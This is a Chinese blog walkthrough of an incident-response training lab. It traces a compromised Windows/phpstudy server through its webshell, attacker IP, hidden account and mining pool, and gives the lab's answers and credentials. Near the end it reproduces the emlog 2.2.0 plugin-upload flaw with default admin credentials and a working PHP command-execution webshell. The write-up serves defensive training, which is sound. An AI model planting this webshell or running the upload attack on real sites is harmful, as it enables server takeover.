[护网训练]应急响应靶机训练-web1
[护网训练]原创应急响应靶机整理集合
靶机地址:https://pan.quark.cn/s/4b6dffd0c51a#/list/share
蓝队工具箱:https://github.com/ChinaRan0/BlueTeamTools
应急响应靶机训练-Web1
知攻善防Web1应急靶机笔记–详解 – LingX5 – 博客园
应急响应靶机训练,为保证每位安服仔都有上手的机会,不做理论学家,增加动手经验,
可前来挑战应急响应靶机-web1。
一、挑战内容
前景需要:
小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的hxd帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件:
1.攻击者的shell密码
2.攻击者的IP地址
3.攻击者的隐藏账户名称
4.攻击者挖矿程序的矿池域名(仅域名)
5.有实力的可以尝试着修复漏洞
关于靶机启动
使用Vmware启动即可,如启动错误,请升级至Vmware17.5以上
靶机环境:
Windows Server 2022
phpstudy(小皮面板)
二、解题程序
如何查看自己的题解是否正确?
桌面上有一个administrator用户的桌面上解题程序
输入正确答案即可解题。
相关账户密码
用户:administrator
密码:Zgsf@admin.com
三、题解答案
1、解题过程1
解题方法不唯一,仅供参考。
打开该虚拟机
点击开启此虚拟机
开始查找线索,首先有PHP study,我们直接寻找相关web路径
打开该目录,找到web目录
D盾工具
上传至服务器扫描,推荐使用集成化蓝队应急响应工具箱,附链接
蓝队应急响应工具箱v2024.1
找到相关路径
发现已知后门
找到shell连接密码,并进行解密,发现为默认冰蝎密码rebeyond
2、解题过程2
回到PHP study中,找到Apache的日志文件
直接Ctrl+F搜索shell.php
找到黑客IP地址192.168.126.1
3、解题过程3
发现有大量爆破行为,猜测存在弱口令
使用Windows日志一键分析功能
查看远程桌面登陆成功日志
发现未知用户名hack168$
找到该用户文件夹位置,寻找蛛丝马迹
C:\Users\hack168$
在桌面处找到位置程序,运行后cpu飙升,判别为挖矿程序,进行分析。
4、解题过程4
分析该文件
该图标为pyinstaller打包,使用pyinstxtractor进行反编译
https://github.com/extremecoders-re/pyinstxtractor
AI写代码
得到pyc文件
使用在线pyc反编译工具,得到源码
https://toolkk.com/tools/pyc-decomplie
AI写代码
得到矿池域名wakuang.zhigongshanfang.top
最后,整理答案,提交。
四、开放题目
黑客是如何攻击进来的?漏洞修复?
漏洞名称:emlog v2.2.0后台插件上传漏洞,有兴趣的师傅可以把phpstudy跑起来,自己复现一遍。
五、开放题目解题
先打开小皮看看是什么站:
在之前的Apache日志中提取主要部分:
192.168.126.1 – – [26/Feb/2024:22:34:28 +0800] “POST /admin/account.php?action=dosignin&s= HTTP/1.1” 302 –
……
192.168.126.1 – – [26/Feb/2024:22:36:12 +0800] “POST /admin/account.php?action=dosignin&s= HTTP/1.1” 302 –
192.168.126.1 – – [26/Feb/2024:22:37:09 +0800] “POST /admin/account.php?action=dosignin&s= HTTP/1.1” 302 –
192.168.126.1 – – [26/Feb/2024:22:37:09 +0800] “GET /admin/ HTTP/1.1” 200 18865
……
192.168.126.1 – – [26/Feb/2024:22:45:57 +0800] “GET /admin/plugin.php?action=del&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24 HTTP/1.1” 302 –
192.168.126.1 – – [26/Feb/2024:22:45:57 +0800] “GET /admin/plugin.php?activate_del=1 HTTP/1.1” 200 14725
192.168.126.1 – – [26/Feb/2024:22:45:57 +0800] “POST /admin/plugin.php?action=check_update HTTP/1.1” 400 94
192.168.126.1 – – [26/Feb/2024:22:46:05 +0800] “POST /admin/plugin.php?action=upload_zip HTTP/1.1” 302 –
192.168.126.1 – – [26/Feb/2024:22:46:05 +0800] “GET /admin/plugin.php?activate_install=1 HTTP/1.1” 200 16182
192.168.126.1 – – [26/Feb/2024:22:46:05 +0800] “POST /admin/plugin.php?action=check_update HTTP/1.1” 400 94
192.168.126.1 – – [26/Feb/2024:22:46:08 +0800] “GET /admin/plugin.php?action=active&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24 HTTP/1.1” 302 –
192.168.126.1 – – [26/Feb/2024:22:46:08 +0800] “GET /admin/plugin.php?active=1 HTTP/1.1” 200 16392
192.168.126.1 – – [26/Feb/2024:22:46:08 +0800] “POST /admin/plugin.php?action=check_update HTTP/1.1” 400 94
192.168.126.1 – – [26/Feb/2024:22:46:20 +0800] “GET /content/plugins/tips HTTP/1.1” 301 252
192.168.126.1 – – [26/Feb/2024:22:46:20 +0800] “GET /content/plugins/tips/ HTTP/1.1” 404 –
192.168.126.1 – – [26/Feb/2024:22:46:23 +0800] “GET /content/plugins/tips/shell.php HTTP/1.1” 200 –
……
192.168.126.1 – – [26/Feb/2024:22:46:35 +0800] “GET /content/plugins/tips/shell.php?888666=619 HTTP/1.1” 200 –
黑客先发起大量的POST请求:/admin/account.php进行暴力破解,登录进去访问plugin.php页面,然后就开始访问shell.php页面。
搜索一下吧:emlog /admin/plugin.php漏洞
Emlog Pro 2.2.0 版本存在任意文件上传漏洞(CVE-2023-44974),攻击者可以通过上传构建的 PHP 文件来执行任意代码
尝试复现一下:
admin:123456 默认密码进去了
扩展–插件–安装插件
整个木马测试:
<?php
if(isset($_REQUEST[‘cmd’])){
echo “<pre>”;
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
echo “</pre>”;
die;
}
?>
http://localhost/content/plugins/cmd/cmd.php?cmd=whoami
修复建议
1.改密码为强口令
2.对文件上传功能点进行严格校验
3.再就是更新Emlog 的版本了。
原文链接:https://blog.csdn.net/m0_65712192/article/details/147071176
[护网训练]应急响应靶机训练-web1:等您坐沙发呢!